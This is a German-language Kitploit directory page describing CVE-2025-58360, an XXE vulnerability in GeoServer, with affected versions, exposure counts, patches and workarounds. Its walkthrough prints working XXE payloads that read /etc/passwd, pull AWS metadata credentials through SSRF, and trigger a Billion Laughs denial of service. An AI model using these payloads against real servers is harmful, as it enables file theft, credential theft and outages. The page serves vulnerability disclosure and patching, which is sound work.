Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Tools/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔓 🛰️ „CVE-2025-58360“ – GeoServer-WMS-Endpunkt anfällig für XXE-Angriff 🌟

GeoServer

🏷️ Basisinformationen

  • CVE-ID: CVE-2025-58360
  • Veröffentlicht: 📅 25. November 2025
  • Zuletzt geändert: 📅 25. November 2025 (Stand 26. Nov. noch brandaktuell)
  • Schwachstellentyp: XML External Entity (XXE) – CWE-611
  • Betroffene Software: GeoServer (Open-Source-Geodatenserver, in Java geschrieben)
  • Schweregrad: 🔥 Hoch – CVSS v3.1 Base Score 7.5
    • Vektor: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Ausnutzung in freier Wildbahn: 🟡 Noch nicht beobachtet (26. Nov. 2025) – aber öffentliche PoCs kursieren
  • Authentifizierung erforderlich: ❌ Keine – vollständig ohne Authentifizierung
  • Benutzerinteraktion erforderlich: ❌ Keine

🎨 Was diesen Bug besonders (und gefährlich) macht

Dies ist eine klassische, aber verheerende XXE im GetMap-Endpunkt des Web Map Service (WMS).
Angreifer können:

  • 📂 Beliebige Dateien lesen, auf die der GeoServer-Prozess Zugriff hat (, , private Schlüssel usw.)
Tool herunterladen
/etc/passwd
geoserver.xml
  • 🌐 Server-Side Request Forgery (SSRF) durchführen, um interne Netzwerke zu scannen oder Metadaten-Endpunkte abzufragen (z. B. AWS/GCP)
  • 💣 Denial-of-Service mit Entity-Expansion-Angriffen („Billion Laughs“) auslösen
  • 🔗 Potenziell mit anderen Schwachstellen zu vollständigem RCE verketten (nicht direkt, aber in falsch konfigurierten Umgebungen möglich)
  • 🛡️ Betroffene Versionen (detaillierte Tabelle)

    KomponenteVerwundbare VersionenBehoben inStatus
    GeoServer Standalone2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.3, 2.25.6, 2.27.0🔴 Verwundbar
    Docker (osgeo/geoserver)2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.27.0🔴 Verwundbar
    Maven org.geoserver:gs-wms2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Verwundbar
    Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Verwundbar
    GeoServer 2.27.x und neuer–Bereits gepatcht✅ Sicher

    🌍 Globale Exposition (Echtzeit, Stand 26. Nov. 2025)

    QuelleExponierte InstanzenAnmerkungen
    ZoomEye~49.400app:"GeoServer"-Suche
    FOFA~24.000Ergebnisse des letzten Jahres
    Shodan~31.000Port 8080 + Titelübereinstimmung
    GobySec~20.000Öffentlicher Netzwerkscan

    → Das sind zehntausende potenziell verwundbarer Server, die gerade jetzt im offenen Internet erreichbar sind! 🌐

    🧨 Vollständiger technischer Exploit-Walkthrough

    Endpunkt: POST /geoserver/wms
    Schlüsselparameter: SLD_BODY (erlaubt rohes XML-Styling)
    Verwundbarer Codepfad: Der XML-Parser deaktiviert die Auflösung externer Entities nicht → klassische XXE.

    f77f64d7c92fd31b29d537f5205da524

    Beispiel 1 – Datei-Offenlegung (/etc/passwd)

    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
      <sld:UserLayer>
        <sld:LayerFeatureConstraints>
          <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
        </sld:LayerFeatureConstraints>
      </sld:UserLayer>
    </sld:StyledLayerDescriptor>
    

    → Die Antwort enthält den Inhalt von /etc/passwd 🎉

    Beispiel 2 – SSRF zu internen Metadaten (AWS-Beispiel)

    root@kitploit:~
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    

    → Gibt temporäre AWS-Anmeldeinformationen preis, wenn GeoServer auf EC2 läuft.

    Beispiel 3 – Billion-Laughs-DoS

    root@kitploit:~
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!-- repeat up to lol9 -->
    ]>
    <lol>&lol9;</lol>
    

    → Verbraucht in Sekunden Gigabytes an RAM 💥

    🛠️ Offizielle Patches & Downloads

    VersionVeröffentlichungsdatumDownload-Link
    2.27.025. Nov. 2025https://geoserver.org/release/stable/
    2.26.325. Nov. 2025Patch für den Wartungszweig
    2.25.625. Nov. 2025Älterer unterstützter Zweig

    Docker-Nutzer:

    root@kitploit:~
    docker pull osgeo/geoserver:2.27.0
    

    🔧 Workarounds (falls Sie nicht sofort patchen können)

    1. Gefährliches XML blockieren mit WAF/mod_security-Regel:
      Anfragen ablehnen, die <!ENTITY oder SYSTEM "file:// enthalten
    2. SLD_BODY-Parameter global deaktivieren (falls nicht benötigt)
    3. GeoServer mit schreibgeschütztem Dateisystem ausführen + Capabilities entfernen
    4. Hinter einen Reverse-Proxy stellen, der XML-Bodies für nicht authentifizierte Benutzer entfernt

    📢 Offizielle Referenzen & PoCs

    • NVD-Eintrag: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
    • GeoServer-Advisory: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    • JIRA-Ticket: https://osgeo-org.atlassian.net/browse/GEOS-11682
    • Öffentlicher sicherer PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
    • Nuclei-Template (Auto-Erkennung): Bereits in den Hauptzweig gemerged

    ⏰ Zeitleiste

    DatumEreignis
    Vor Nov. 2025Autonom vom XBOW-AI-Scanner entdeckt
    25. Nov. 2025Koordinierte Offenlegung → Patches veröffentlicht
    25. Nov. 2025CVE zugewiesen und veröffentlicht
    26. Nov. 2025PoCs werden viral, Expositions-Scans schnellen in die Höhe

    ✨ Schlussworte

    Dies ist eine lehrbuchmäßige XXE, die eine weit verbreitete Geodatenplattform mit zehntausenden über das Internet erreichbaren Instanzen trifft.
    Die Patches erschienen am selben Tag wie die Offenlegung – riesiges Lob an das GeoServer-Team für das Tempo! 🏆
    Aber das Zeitfenster zwischen Patch-Verfügbarkeit und massenhafter Ausnutzung schrumpft rasant.

    Wenn Sie GeoServer betreiben → aktualisieren Sie noch heute.
    Werden Sie nicht die nächste Schlagzeile.

    Bleiben Sie sicher, bleiben Sie glänzend! 🛡️✨